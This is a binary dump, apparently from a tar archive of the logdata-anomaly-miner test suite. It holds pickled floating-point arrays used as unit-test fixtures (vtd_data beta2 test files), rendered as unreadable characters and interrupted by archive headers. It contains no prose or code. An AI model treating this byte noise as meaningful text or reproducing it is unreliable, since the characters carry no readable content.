G?#UG?Kv:G?f?G?G?׬|G?蜎hG?'$2G?S~WG?3%G?L%U_G?~8}G?m G?qG?9˪-G?zK]G?g>G?ū],G?܅-G? sG?NGG?AꍽG?0<=S4IG?_@G?GfG?yG?i/}%G?Ӝc…G?')1G?.ۍm҇G?wDG?ENKG?bKmSG?WwG?FƩG? >>G?ngG?B/PG?G?0 =)G?౗zG?G?JG?9X0 *G?^bG?Ը)G?OG?TJG?ٌG?6mo%G?Ox}G?BDG?e NG?ŲŷG?*k#=G?쬨JG?4B{G?YgG?F G?`bG? Ux՛G?/țG?"G?BMG?I&xߝG? )כG?P G?s)G?t?$G?wG?S/G?쿳 5G?)G?tx0G?G?{姥G?tLG?*!LG?Ό=OFG?_wG?Msvj>G?:h_G?nzG?9ˠ'G?;LjG?CzhG?iRG?V&g{G?IJG?@iUn G?"G?MBG?u< G?4hG?G? JjG?WG?K gG?Z bG?#wG?-1rG?XŒG?|qG?/G?0٦$G?|#y;G?[G쎻G?q|v|G?-isYG?4G?Vd iSG?=G?)G?yF:G?ˣG?7=1qG?蘘=G?aE G?NG?%=G?XG?HY?G?jG?Ӕ+e\G?%rG?y&*XG?=G?ưyZG?rG?JA)5TG?gG?6lG?lOkiQG?<:i#G?]8gG?{‹G?rnlG?q4MG?$>iG?Ą +>G?bwrG?OAG?绺ǟG?Ԙ'G?'nYG?N/G?&*G?aqG?]:xG?GbQG?# :G?8[aG?e{|EG?ξG?ѨJ.G? .N+IG?йV(G?$G?|JG?!XGG?AUG?=~G? YG?VOG?#G?{3G?xnCRSG?UG?g'AG?tG?|JG?<7ӘG?ϫ?G?ẘH;G?)G?M}sG?ܸ5G? G?4!ȜG?խw0\G?06G? (G?stjĊG?@G? ETG?.MG?> D3G?[l0(G?"G?5ÀG?/NZG?vG?hG?fqӡ~G?&pE:G?`'G?jG?SMG?i*G?8G? lG?̶G?8 LKG?t#tG?soG??c@G?,#G?滺 rG?/G?8G?c)xȂG?*%x G?TOjG?G?_84%UG?#G?,7pG?gO3,G?-DzxCG?ǧ<5iG?hGx&G?Y RG?U$шG?d>jG?2ZפG?ĹG?UH7G?bT'`@G?Jhqs&G?noTG?ݼVhG?|YG?'i1>G?g2EG?vG?o,4#@G? dK1%G?QG?99G?PpG?e(G?L;րG?fG?Z~G?2(G?j:DG?-iG?8OSnG?`+KEG?DNG?#DG?Wj4:0G?ݰ5mG?G?UMG?G?L/wG?{z G?1ZG?+;ڷG?]@G?ExG?ь\G?DٽnG?xQG?X.G?1ByG?`H~TG?= nG?FCa9VG?9&G? gG?l RG?uG?IG?cK=1KG?9"yG?hZG?/ >G? ViG?$1G?2G?/]G?< CG?mGG?]XCq_G?$G?K9 \G?.ɭHg/G?G?:N|G?w^ pG?YAūG?D5G?WL9G?^G?댈mgG? G?셮@@QG>pQwG?ւ0cG?hlG?8&wG?mG?V饊G?[d G?T 4G?ݓUG?ZX`G?ZmG?K_n5G?_dqG?f̈́G?ٔ*_DG?=-9G?ҚSG?TG?y"\`EPG? ]G?,4?G?*#G?Þ~0_rG?jwPG?T)zG?1gG?_G?IvG?2G? =NG?B6G?QU<G?ւ<&}gG?28+G?Xn8G?ʦv'G?FrrG?bLG?o6G?xPG? G?G?^G??pG?7m]G? 4G?h;G?Զv: G?!wG?ꡩ'`G?S?G?N-\27G?Y$NG?Uc G?FZ6fG?8 >}G?{U"G?-_[G?x҇G?]>G? ߙG?85{^G?QG?NG?:+3G?oG?/gG?}5BG?6G?ї bpG?sb^G?r^g0RG?ÜG?vyG?ioG?2C'G??G?4iBG?nG?:H)5G?qG?8TG?ɬ2G?͈G?~0wG?|1G?ƚ*GUG?:EG?H G?7S6G?G?i)G?/G?֊: G?XG?ˆwG? G?G?%!`G? G?!cG?SG?S1G?7(}G?ga%G?̨G?G?򊤯NG?ʾG?후mQG? pG?^є QG?vJ}G?ЕW8MG?MZ)G?xG?SG?T G?XJAG?NG?#рG?v|x1G?ؗG?S=2G?UmMiG?IwG?Ari8G?놿G?nKStG?z[׊G?UYmG?/,G?7G?[skV>G?ؑWG?ȲG?,١|G?~.HgG?HuG?;r'G?TCG?Oh!G?壑NG?O犝G?F\G?;G?\~G?[u-G?䝨fsӜG?:4G?P-G?N*!ðG?ڢLG?]0KG?)ͿG?YG?z pG?,TG?Yp$G?ػ\G?nG?ӵsVG?iG?cXyG?1jڢG?dG?JA0)G?>qG?#)@G?٩SmG?9 6G?|$yG?ʹn*G?>G?tqPG?ʳ];G?Q!G?є[ݢG?=>G?lqG?g+]G?ͿyZG??#jGG?!nG?ԨeG?~tG?*nS#G?v#cG?j='G?<~GG?۞G?=3+G?/L0G?OhxG?beG?AIG?쓒G?PG? $MG?-JG?52"AG?R R=G?{,9 G?K$l[G?KG?PWU L+G?6G?N$ɄG?ʐqG?*TG?Zg"bG?Uҗ G?xK2yG?7]G?xG?G?@LG?%G?=WG?n<҇G? )G?|=? G?ߝAhG?xJG?kPH]jG?=GڗG?#S%G?޾[aIG?ҿJi^$G?c)G?wŸVG?Lh2G?.G?(6:RG?*G?T6qG?&EhG?N@ G?%GmG?:G?苾TG?̖rvG?c}G?t YgG?0M)JG?>JOqG? wMG?ػM9,=JG?5G?Q}G?)TG?M/.G?gG?5ecG?t(G?gڅ1G?&|G?2EG?M.4TG?G?e5jHIG?6|G?VB$G?OaMӄG?k]G?VUCG?(dKG?Jm G?v7lGG?е,fG?ܹG?0G? G?r7DG?\"G?젳0&.G?_xSG?߄pNG?YG?ųѕyG?Qk[dG?OXG?9y\EG?G?G?#n;G?ϿG?ze](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta2_data_test3000066400000000000000000000432761500476301700275260ustar00rootroot00000000000000F](](G?/J>G?5fO2G?n1G?)pS\G?F6G?蝀G?MѰG?>4jGG?jQG?7zG?<~G?]S>7+JG?~=$uG?0>6lG?с)"G? eG?q |%G?6G? 5G?Ŭ[W G?oҢG?BG?d8G?VJ$GG?P-G?3:G?GG?jL4G? G?43j{G?a5hG?֗? G?>sXG?̇G?tgKG?m-\G?}G?B G?r6wG?G:dG?呅+UXG?{G? G?DG?hLG?yOSG?_Gu`G?S AG?⎦++G?[?)9G?ǶzG? @0G?ywG?x {G?q\9G?W5G?eqG?G?n'֚iG?3Xy\G?ȡ[M)G?S G?R@^G?@MG?fG?266G?hҡ,r+G?"G?&}yG?l8 qG?K<G?Zf3rG?G?Gc5G?kG?wG?׺TpG?S|[tG?oc‹G?  G?|אָuG?V6@G?{lG?ԅUG?`G?J:G?7A%G?zFG?+EBG?"BȶLG?vNG?xG?K#G?# G?|G?SohG?UXeG?3#IEG?ƧG?~ ԋ(G?$oBG?TvG?#.G?n8R0G?r;/G? .G?.G?픗ŮG?'+G?8&-G?m@#G?FG?m9G?>2]fG? m582G?GR)G?i'pCG?|SG?ӏG? >G?33&G?@LG?!hG? xB'G?:3dG?G?5@G?bbBG?cAG?ýhG??NEG?ۊ$G?,ػ_dG? 5G?yyG?( G?,kIGG?&G?irG?0=G?')"G?gx~G?^*X G?9]G? BG?d=G?>>qG?&BG?~5G?d/G?Y1ԖG?iƜ3G?篚|G?o}GG?iP /G?s%f G?6eAG?vJJG?6YVG?;G?:}'G?P|G?c2G?ᐧ,TG?jG?\oHG?@蔡'zG? }G?qoG?BmG?C 'goG?w蘊G?{G?!5G?vC5G?ȃG?TA07G?j=G?aE@k3G?נI뛢G? c[G?{B/G?-*G?P\ G?2 XG?rGG?iz9G?]G?'7'tG?MݥbG?2wXG?hY}pG?18I{G?aMd6@G?AGG?RC;&G?C-cJG?SH3G?Z~EG?rjG?몝O1G?Zܯ^G?6$G?OItG?v/ccG?܉X5G?~| PG?z$G?JNGG?}QwG?jlp.YG?'`G?o&G?41G?ۏ G??f6UG?i)qasnG?v\G?@>G?9 G?V G?յG?ԌަG?Sc"!lG?f'LG?mA?G?]k6G?橿 WG?[ G?&nG?"FG?N3G?IV4G?ї2OG? pG?QQcG?[`rG?xTX5G?抁2D+G?c1G?8'>yqG?#NKwG?y" G?ZnG?RKDG?PpcG?*؏;G?t(G?ijG?dc%G?]1ŸG?q'G?w6M{H-G?.+0G?kEEG?_ G?{{vG?'G?^I\yG?9s`G?kYXP^G? j VG?@̼BCG?;!G?!4 G?ZK2NG?s|sG?KCG?DqSD:G?_IpG?M*{G?|PG?j.*RG?-;G?;i>(4G?XG?6,G?Z\&YG?@UM8G?y,)G?m@D~G?@3kG?EWHaG?3{G?+bI8oG?ߖG?yCǵG?G?aOWG?.:%G?,L}G?x-)G?FUxZG?߁G?˯qɫG?䲻AqG?u:IG?ꉶv_LqG?jCfPG?~3hsG?G?~&G?#+jG?A_G?jUG?.F<G?l9G?j7+ʅG?愚G?VG?ں*G?qAG?Bp ?G?顨ܐ`G?ė*仳G?|"6#G?s6#RG?"[ G?L%G?=z=G?yG?[ G?ϔf`G?뱝4xG?տiDG?=hG?UJK G?KVUG?CeJ/G?>DG?~dG?ZˉG?O Ml+G?c`6PG?Z8mG?̲{NG? G?gf@0IG?@G?U:G?hG?݌ØG?슫8XG?btG?%%YG?nG? 9G?"tG?Srk0G?-xG?@YG?U^dG?žBG?&!G?j9G?lgG?9$3G?SG?0G?)G?B`:*G? x1G?sFOG?8ݽG?~#HgG?M~+G?hlG?cG?]%MvG?UG?ʃɖׅG??CG?ᳳڰ>G?T\r/G?QXn$G?A0uG?铬5G?u]X/G?ۏ=ÏG?-/ԼG?:bG?)'G?L^;$G?G?uع#iG?@z8QxG?Q-G?ܫzG?G?:#~G?pNG?]\}G?&G?jEG?b٢m&G?m{|vG?RD1G?nG?NG?fG?gG?F\1G?alOG?خ K'G?/'hG?lg@5*G?ph˅G?cG?rmG?RץHG?sst:G?CZYG?'G?8w?JG?:u7G?朮V @G?ꀢwG? OG?oCrG?銗 9G? fE:G?+`"aG?AXG?6adG? сG?̎G?`EG? ` G?H$G?J&EL#G?1pG?kzG? FjG?πgMG?9 oJG?'G?~G?kǼoG?E_b(G?i G?E{"P)G?pIG?v|TG?G?n`G?烔]DžG?[G?l?KG?FgG?;;=oG?uLRG?O2G?laG?^黶bG?[IG??SG?پG? ޕG?㣲z0G?zpG?wWG?+wNtWG?q<9G?;!97 G?BzG?vjRG?㾙G?2/G?/G?.G?槭}nG?`Gi8G? 5G?ryݠPG?1r]kG?9#ի G?"G? G? 1%dG?ှ3u`0G?`NG?DݧG?能#G? $1G?꽟/ BG?SG?pG?r7G?!XG?o~G?G?OG?; G?{G?+iG?SȻuG?IeG?JiG? OG?3G?<: G?J oqG? ~ G?fG?O4 G?7'HG?rfG?LTyG?-'ۼG?{G?uBG?ݬDGG?G?LG?DG?żG?lG?>oDG?ƱG?|sG?VG?~5\JjG?@G?[ [G?5n8zG?(gitG?subG?aG?煳DHG?8G?)z7G?}y>yG?c/;KG?G?bŒG?u `G?⢥+G?2G?ԃG?o'WG?<#HkG?鳇GFgG?Eƿ7G?0}]G?F;)G?tcG?öYAG?QG?S6O:G?I yG?{;IG?SG?6tG?ۿlG?;ߧG?3/G?PrmG??gQG?RsG??G?InhG?F_ohiG?? G?d%7G?/G?&4CG?ZO1G?8&#GG?처.Y$!G?f-tzG?'&|jG?rc L G?o5G?驑BJHG?v=`XG?hG? 2`8G?xXe]G?WqCG?'G?VP G? "6G?R!,;/G?~d)G?큡ԛG? G?НǼ/G?A F|G?izG?yHG?j}UG?g0G?wO G?CB>G? ݔͱG?BWG?AfZG?觠|"G?hҠDG?74&G?PeG?G?ISG?)m2G?Qh6SG?qlbG?)1QG?.>:G?X*aXG?i= G?x-eG? AG?pṩG?qsG?{VG?X1G?ܜG?+G?g2UG?:QVaG?s0,G?5kG?@;G?gKdkG? h|oG?,*G?fG? 4iG?{tQCG?{Q\G?!oG? E MG?H]nFG?71G?+FTG?$$8G?"#xjG?법 5G?8޸MG?3ǬG?Po9lG?G?@\kG?僠~SG?(!* G?F^+^ G?E1LG?"ѽG?M{2G?t^NYG?%&mG?'s/G? G?!G{G?IG?[.G?NbG?7:UG?G?xG?x_"G?WG?vϤG?%ʞG?=iigG? (~)G?dG?k{8G?* G?wkG? G?BqQG?>;ZG?ct G?탱 G?o[#G?L^ G?@G? dPG?:|?G?X \G?\̈yG?kYG?o0UG?s]ۮYG?盼;.PG?۩iGG?&Mc*G?[MuG?̑3zG?svSaG?UAG?pcacG?ݿMZG?MG?vG?_/ѳG?#9G?B*G?bIG?VSrG?UåG?)*euG?] G? )g}G?k8AAG?ބ&G?_̤G?J"kG?JмG?=`G?gG?)KgCG?6y% G?)'G?^G?yWG?v>G?ȡG?G?8£G?|G? a(G?ꙏӓG?s1G?'nG?ݴgG?~ G?ݝG?JsG?KG?O9VaG?[Y4%G?وlr#rG?1bG?G?G?+eG?P2ZcG?!>j_G?`QG?/\G?ɛG?tG?)uX(G?u,NG?OoG?ꃊG?0i-G?<ߩz{QG?{JG?7ȭ8G?W;G?!)G?ݿ쇥G?9 G?:aG?W~tyG?(*F5YG??sG?.G?.ZG?yG?Kt^AG?꜃wVG? P$~G?G 6vG?CaG?qei[G?%̻RG?wG?# 7G?G?S5;G?TIIG?1kHG?%,gbG?nx8G?CՌmG?¤HoG?5?0G?T41?G?g;+dRG?84G?dhh\G?G?vIG?.^'G?ۇ^S~G?G G?'rG?wvG?T~VG?'%G?6G?]{yG?B7,G?BPG?jwuvsOG?FhgG?:aOG?_}-G?j|G?+reG?>`=G?k&G?G?|n%5G?&GkZG?YΚG?SG?<iG?kP] G?{eG?)6G?g`FG? { G?CG?[G?eG?/xG?贿04c;G?%yG?{O|G?v7}G?`q"GIG?#FjG?ATG?нG?dG?wGVCG?!pG?ȫt)G?咯G?3kG? *Z[G?\1G? fG?+\ G?wCG?֍| 7sG?eYBG?mgUGG?/NG?vLbG?TG?Ww!pG?^3G?OX}G?݁ZۋgG?N!lG?w5~G?Ľ0G?꒔ߖ4G?clG?cG?wCyG?J . G?뫾4nG?}HmG?_P<@G?e%X#EG?q+`xG?ZdG?I|G?줆oNG?0 %GG?+kG?0ՠtG?Co G?)$FeG?^D%G?FG?k6G?>ՐG?G?/_Q#G?f^G?nG?/M8-TG?"ӹ{G?鎗KգG?KfG?*[/G? G?}mG?ܽG?i!tG?$eyH1G? rewG?[zkRjG?莣QG?ԏ wG?S YG?q:ƼG?Cn#4G?}n?G?%vVG?C_%G?[x:G?;UK G?E!G?+ G?هG?ibÎG?Iĸ%G?^CG?CG?JG?",6}G?,C ^G?:)G?ȫ%7F G?eqhG?pNG?4&G?C/|G?<$SG?餥NG?AG? G?̑G?ZiWG?j JG?5DYyG?V))G?e\G?I< G?vjG?@CǑG?vRP'G?cG?CCvG? Q G?5-2VG?1|G?/G?,$zG?嚽.G?ڥPUG?.ngG?D:G?vG?/iG?VճWG?|釶G?h~ UG?G?ZRG?E s.:G?4VZ(G?ZcsqG?2U G?aJG?1ƫG?9G?WV.DG?waėG?Ӫ-G?h<⪹G?XqG?XbZG?㟻`G?kpG?傂OG?E{}G?MzG?Y4)G?bgOG?XG?DفG?LBvG?P;/YG?-vG?nZG?WG?xI-XG?E QG?T9OG?LhpG?AG?U+VG?ޛH+xCG?ꄓԸG?bG? nhG?3G?qfclG?G?傑+kTG?SG?V~G?qTG?P~G?q1G?혺^zG?V џFG?d G?1ՙ"mG?ߞ_xcrG?OdG?CZfG?t-l8G?)CyzkG?wSoՕMG?GIEG?t=}zG?GG?JCG??G?mR$G? toG?]G?WFmCJG?$%zG?h[G?:aG?Y0*G?zI)G?4G?Y,@G?4jG?n[G?{G?TͧZkG?6{G?=>z1G?8nxG?柜}EG?ۡsA@G?kôG?Mo "G?9G?浏ңG?VqG?ۑq$G?ۆۣPG?ꞒEyzNG?͢G?_j`iG?oopyG?[EG?>&~G?1G?4{mG?|,(G?U.G?됌kzG?yهG?XȤNG?睁YG?1} G?^tG?o@G?-KnR9G?漀K2NG?xRG?=>G?I 1G?ꋗ' G?ߨG?iNG?[)G?OȸG?SQG?~G?ۖG?KG?XکG?e )G?駎G? limG?AaڳG?B0{3G?\, K`G?ZnG?}5G?&b8 >G?DS+5G?"bG?u)VG?ڱT7G?keG?XG?fo G?טHG?Es.NG?tG?SxDG?YG?}@gkG?nvXG?iG?$Y=,G?-"&G?|hG?G?UhdxG?;S#G?tG?vG?SG?Xyױ}G?%_#sG?oÈG?(Q,G?G?kĖ%G?!p#G?ϵ [G?""G?EfFG?ߜ :G?AnG? O*G?lnlG?.&J,G?L9G? yBG?uPdG?:fp{EG?SVG?sݮ]G?mG?\=mG? G?OG?,KG?䯅(G?G?94 9G?5G?(G?;Y~G?^,ХdG?4=dG? IG?"2G-G?胤40G?#G?ⵋJ~G?"G?~ >XG?X ^G?okTG?䔁ڮkG?%{gG?j~rG?4G?cg]$G?f/pf4G?C7G?HSG?HG?b|JG?.iG?dtG?YDW:RG?%FIG?*"LG?S,@K?G?$0G?ѳwfG?ʛlG?*OG?hieG?B9$2G?exQmG?ӕwG? G?@ucG?oڨG?鑍AY}G?N}T $(G? }G?hGSG?P G?"%6G? WG?̣ 5G?2G?HdJG?9lQG?(ӌ1G?Ꟙ69-G?cG? /e;G?U`G?[?G?OTVG?졝 G?9az4G?1G?uG?E]TG?R=G?L&@'gG?#&nZG?8JeG?n!LG?@"G?{kG?f@:MG?䜐# ,G?6eG?< G?=qG?Bzo>G?42%yG?ǕG?& G?"G?2 G?}G? jG?ZʤG?;OG?`$*G?TG?)G?NG?pM[G?**$IG?4G?~̈G?@HG? EwiG?56@iG?ߨEGG?HeZG?:!fG?U;؊G?ܷG?1~)G?[=G?ꤻ"G?Jܞ?G?qG?P/G?*tL^|G??8vG?@଼dG? cb{G?9P*G?[G?Td4#G?:"~G?ntEvG?b.pG?b8|4G?7hZ7G?'?KG?--G?UݧG?[1_xG?R@G?񼄞yWG? yQG?۪d%>G??k ZG?K^tG?х)G? $G?ǮG?I4BdG?HX G?{{G?팞yG?G?%߶^G?-*_ǛG?GG?#MG?= wG?t*tG?ѧG?auMG?sj]4@G?2G?QЇ;(G?䋍X[G?kG?"LG?wx;G?ԗ>G?䗹^G?$eG? =#VG?,G?k‘G?`G?"q OG?'CsZG? 5V*G?x, s\G?n:DG?}"G?k ;HG?ۙ^mG? mc=kG?DDG?fG?ÎVYLG?DBG?⻑2gG?+7eG?qI{لG?4I5G?FG? sG?êG?]*G?gxáG?E$G?|rG?ߎ*pG?mnꄚG?2fkG?8E*G?:vMPG?o&(yG?Hi\G?eG?⌺9G?:НG?aVǑG?lu36G?XBeG?fG?wY|AG?1̀YG? '-G?E,G?d* G?h.G?JjG?ٮG?&C\&G?lpG?ICtMG?c- G?s3e8(#G?HMOtG?_G?bZ~VG?3KoG?9SG?ӹG?~G?kJ+G?C3BG?ܬG?b(uG?AC{MʒG?kJG?5u/G?nK G?~PDG?:G?a=hG?⮰G?MKhG?PEG?WCG?.G?vaG?鏉G?G 8G?X$4G?A.G?6M &G?umЭ2G?9छ4cG?fBG?ErgG?^Bs4G?PmG?_"lFe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta2_data_test7000066400000000000000000000647021500476301700275270ustar00rootroot00000000000000i](](G? ڱBG?~`*hG?G?\pDG?d;?G?⧡iG?^G?WHG?S%G?0z;G?fbG?ʦqG?uv9G?GwbG?,)]G?)c!G? bVJG?7@G?X4G?띆 aG?GYG?snG?b2@G?4EG?QG?>n i9G?mMkG?1|G?*/G?U9G?;vQG?vLDG?CUB˵G?@.3G?l(hG? (OG?r,?IG?&YG?|GKG?z1&G?F3,G?;80G?FkG?AX sG?Lmy G?'F@G?hSe4G?tkWG?p5"kG?`rOG?殹aڲ G?k5!G?i 困G?9gfG?ƺAG?Љ#ZG?h'4G?9ѽl1G?YhG?A< PwG?[NG?$_G?F"YG?6G?SzSiG?ZvNG?=sG?ㆼf4G?-VG?&4E\4vG?KSG?7 qG?ZG?R7BG?KNG?51G?*cޅG?\v!4uG?'+PwG?ދ G?Y~/nG?꼡k7sG?xexG?TR[G?d4И]G?;G?Ѣ.WG?G? 5G?@G?DC7G?rnjG?nEleG?DhkG?9:G?E[*G?twG?no6G?%'6G?SOG?h);G?c?ՌG?~G?}OG?6]X%tG?0soG?tG?hv G?qG?G?[&NG?4*G?zaG?{G?)G?ɸpG?EG?S>ޮG? 0~G?rkfG?6G?R{G?Z}FG?5)SG?;\şG?5G? ؆uBG?%CG?澡 G?쁳G?}(sG?2u+UG?tΊG?!>G?ݦd)G?EoG?1  TG?F=G?-eG?VL3G?#G?֝G?| 31G?Iӳ}G?ъ PTG?,,'G?验-bG?qG?R'?G? ?SG?`TG?9G?恼G?H ukMG?Ti}G? ~efzG?ts UG?G?K1G?ûG?zjQG?#TvG?]/0G?1aȉG?m1^G?sz}G?嗔GG?'oV7G?}#o_G?dVg1uG?飅G?5ʐWG?SD^G?ڡG? G?!{XG?de~=G?\G?ʜG? G? ( G?G?o~G?.KG?NG?C{oG?O>G?y3G?:XG?u LG? MG?(G? G?}OG?➘G?N:G?;G?oG?84G?kӔDG? G?<%G?搢$G?vtG?_kMG?:H!G?ª".\G?>G?%D G?բL'G?B$ `G?Pؿo+G?c\GG?-dG?C)+G?/^+OG?GȦ5G? UG?qp/ G?"G? G?a׺>*G?+Y 5G?'vG?깔uG?={4WG?zKvd4G?7>IG?BZG?8;1yZG?RJUwG?h4%G?ه&ae9G?߷G?gG?3*G?&_^~G?҆ϬG?zG?apg+G?G?WXkG?ۈG?2\sG?LiUG?/(xG?)T_G?ׯJG?ڵQ\G?G?-zkG? %hG?\JG?}#?G?嘵G?73G?TRD"XG?w(šG? 8G?[3G?@LG?DG?8R G?㞺=xG?PG?UKĐG?d8G?g<&G?AG?5a0ЅG?s9WVG?8$\$RpG?`o{G?G? _G?߰JVhG?7x,G?L|G?;GG?`^Q@G?"5MG?,gG?+ G?wG?(G?^^GG?؝S*GG?޻_G?`G?}loG?4s`G?ԸQ^G?mwG?͊G?~j!G?$GMG?DA #G?}4G?T8[G?4i<`bG? {,QG?,cG?ٞ/G?TSfwG?xG?Ef$9G?_cG? SjbG?OV3G?ԌG?QG?|52՛G?_tJG?e/[G?67FG?;bG?{G?wG?+ةjiG?}6}-G?IG?aG?kkHG? G? nPmG?aG?I6ޢG?dajG?G?{zG?l3G?xŬG?6؏lG?$rBG?\st.oG?8 tG?4]G?`~tG?^QG?`MyG?QFrBG?@?G?PFG?N,JG? G?:/ZG?A{G?1 (RG?ݫ*f^G?滷#G? a/@G?QJPG?Yn5G?^PG?CA]G?.ȑG?uG?+PBG? 2AbG?yRaG?N"qG?j*>G?B:NG?-=G?bG?yG?謨GNG? uIG?#*ؒG?>&G? rG?0G?2pG? G?2<%G?\HwXG?jXtG?ՠG?G?u#ҾG?KjLG?`G?(` G?u0G? ,G?hG?{渓G?NuaG?: G?hG?)* G?P?G?YgȇG?EG?G?X>nG?ꖘQG?h`G?詽ňG?cȥXAG?*|kG?G?)R/NG?袕y G?}5OG?}D[G?B y]G? 4WG? <\G?̝G?;`:G?S_OG?]_/G?&F!G?]BT(G?l-G?BExG?OKG?< خ,G?stpG?|G?P`MG?Ne,G?''*G?}G?{jG?$(֒jG?~05G?Fo.G?duG?DOG?jR*AG?{aG?ma_wG?ʒ{yG?VAG?yGLG?Ꮏ~;G?`^n5G?G?Z1!%G?apq7G?cIG?ŽE G?a4oG? j6G?U eG?;\m'G?qWG?$ 9_G?`RfG?ë%G?5G?ymG?@uG?IG?UFG?J$aG?~{)G?ZiG?xT3G?G?U ^DG?[FG?s{0}G?eL l]G?D7eG?UG?])G? 96G?%5ݴG?b:yG?)_ G?z/7 G?e G?T aG?6eĤ| G?UG?⊶G?oّG?SG?>G?ݓ703G?*%?G?OM]WG?6FG?3~<_G?M98G?x*bG?xAG?K G?0KG?쒶S@G?鎪G?іG?0yG?\;G?⸚4`G?išG?οBG?鏐Ӣ-G?0{;G?!Y -G? 䩗MG?\G?bؤWG?S]LG?trV G?MJ=-G?ye^Ae(G? G?#X^G?jkG?sɏG? 뜤ʆG?9\$G?oe+G?>G?xͳG?tTBG?G%IG?n}%G?])*KG?˦P,G?$u8G?Zg;G?{~vG?0ހPG?RvG?kG?P}xXG?:G?;:DeG?G?\,&G?&FG? DMNG?G?yG?YkG?0G?aN|G?(G?-TIG?ys4IG? FG?C"m0G?`h}G?58.G?ȱ(,G?\G?)(0G?GG?ls'G? 2G?k&G?aG?CG?G?Uxh0G?#`G?ۂ~MG?/0VG?҈)G?ԩߒvh G?~&G?R$7|+G?c(G?Qd8G?/G?jIHG?Z~G?w|SG?mWG?(W2mG?̪mG?SIÜG? T-{dG??-=G?f$;5G?麨t^!G?|f>G?"zdG?댞1DG?YG?g@RQG?偂LmG?U SG?g޷3G?RG?枣@OG?|G?%%G?zG?~!G?W'&G?3yG?ѺG?MG?UwG?3LӏoG? }|)fG?ş G?ɓ|=G? G?@I_G?AG?fG?= ϋfG? ÐG?/:nG? =G?VG?㙝%G?G?IG?Lz-G?1 G?jG?IwG?شeL7G?ꐯG?<\3G?cG?P!4G? IvG?JF0G?sG?*/91G?.B)i5G?І)K2G?#TPG?ŕ G?$G?mG? m9G? vG?K:(G?X 秽tG?]G?. ],G?PmKG?꬯G?틕ۈjG?Y2NG?G?{:۱G?ܔg$G?J?G?]G?zJG?ɝ$7G?G?H۪G?|+X) G?K+G?띪eįG?bၮQG?h G?Z#G?WG?AWuG?k' G?AeWG?rB+sG?U6G?iJG?멇 ŬG?B儱VG?j'G?( RG?7[ HG?kbXG?>KG?랞+k!G?yG?A G?憐޵G?vOG?sYFG?^G?BdG?끒bG?E vG?$ezG?%|[G? }5nG?=R|G?>{G?fMG?OG?]w+]^bG?>ԯG?!,VG?]/G??HK0G? 9G?y4G?=!0SG?o%'G?<%%G?38rlG? .COG?f#G?H'G?kgd`/G?F|`G?#IG?cwXqG?臎{|{G?.G?Օ23G?fH#G?7F:G?H* MG?DG?eG?sG?!"G?Wsn%_G?.]G?]JG?ږkVپG?G?F 2G?Y{QG?E{G? ú|G?:m?G?-f-G?<5RrG?$GG?)(:G?T|m?G?ퟝ#MG?(q8gG?sUbmG?KsG?P}K[VG?|CHG?*ǣG?w٤Ɩ$G??͇qG?է0MG?mPG?]pG?yG?.>nG?\y%G?d G?>ce(G?ٻK !G?6G?h9QG?GG?*G?2~4ZeG?hggsG?&G?gTi6G?O;LsG?$%G?盐{)G?Y uG?^s[G?!u{G?4e%G?8{nG?;~G?aSG?N&KG?̆?RG?_G?6#yG?Vu1FG?2G?WTG?J G?C2HwG?|,eG?&G?,qѻG?'F'G? SG? ݾtG?+BAAFG??tgOG?ශ0G?Z*8G? OyG?.G?0/G?rjǛۿG?E#)?G?ф(.G?!}G?,9G?BIQG?zX'XG?E1~G?IT G?#犠G?fŇ@G?݈,HG? G?y=%G?닼kG?DJ@HDG?ćG?շ$G?炈xJG?*˷G?uG?jTG?ŷ}>G? =i8G?9W'G?BG?B+=qBG?1He`dG?]G?lfȃG?IE:G?pG?¯QG?2RǧG?+x#0yG?NiG? G?<G?>WG??G?s8G?T 3G?oG?pMG?Z4G?;q9`G?O{IG?6G?i5G?km*G?QgأG?#|G?G?䏾)G?GpAG?!$2G?$گ&G?+.G?|NoG?˸]iG?_tG?= lG?UC硗G?{%G?ʊCG? L4G?iߜG?nG?=G?`*xG?[^G?Bq=G?:g)G?N{֧kG?o G?1uG?4uG?צLMG?aG?,NG?G?隟CG?ȸpG?[[uG?m?'G?yT nG?ZG?Tpi7G?y}qG?qھG?(3.eG?uh_%}G? M`vx'G?Z/G?(,:?G?U"CG?h,JG?їO0G?гIG?wG?u3|9B4G?/ %_aG?mnJ`G?p)EG?bcG?A VG? hG?ARG?M9)TG?%'o0G?ݪG?겫G?˸GG?هîG?㡋iG?)FG?j+"G? G?+vG?GunTG?VȥG?վP 3G?Ǯ>3 aG?@!CuG?K+@wt6dG?LG?F#iG?B"?G?/WG?Yf^\G?sKG?'J0.%G?WA!G?\/YbG? )t'G?5&>}7G?3˂G?I&?G?u|G?Q&[!G?8koG?L fCBG?̼G?G?fPG?dKG?V_1G?_A?G?Ø7VG?Cʒ;}G?WG?fZ|,G?G?޺ǼG?N$G?߳vT:G?/G?U_G?o!+G?tϔG?*l}GG?\]G?*aXG?8G?$G?ݨOG?꛰ G?TQ\G?K{G? G?~+IgG?S5LG?h:#G?r7G?G?S<}(G?VP|G?>UGG?[QG?zǭG?\^eG? dG?9p@G?uG?gaoG?zv9G?AiG?\oG?Wn[_G?9~Y~G?~G?濴o}}G?EQPMG?JG? UG?棚G?txG?a#G?n׏G?弲G?xfHG?+?@G?Rn%PG?lsMSTG?+G?*G?7+G?EXG?G5G?G?%lG?^ l$G?JJ^G?n4HKG?>G?u?tJG?]:1|G?΃K%G?]sKG?]7/CG?~jG?8\XG?5" IG?A+G?c G?B'ՔG? :G?̝G?vFG?칠G?G?KAG?rLNxG?ޘQG?1c|G? G?5+G?  rG?޾G?tS\cvG?hcF=G?q^G?/"G?AgG?嵰F(G?$k ~G?3zG?Ak)ϘG?/e6G?уI?G?fJG?^iG?iS4CG?ݗ?G?,ACG?炻_ηG?|qc'G? chG?Kb&uG?KzG?swoG?%G?8ccG?fjG?/G?ڣg[G?SxqG?.; G?G?\[G?t>2 @G?LFRcyG?H`J/G?tD)G?PsG?GSG?~nG?svnG?:G?衛1G?oG?+S5G?Ɍ6SG?08LG?LyG?SG?;0G?hՆG?[/G?u3G?muG?0\G?Z;.G?)j04G?떄#LG?K=G?K3-G?0qG?esd_G?ya'hG?G?˚DG?G?%G?%fDG?{m&G?!G?;f>G? .G?67G?b 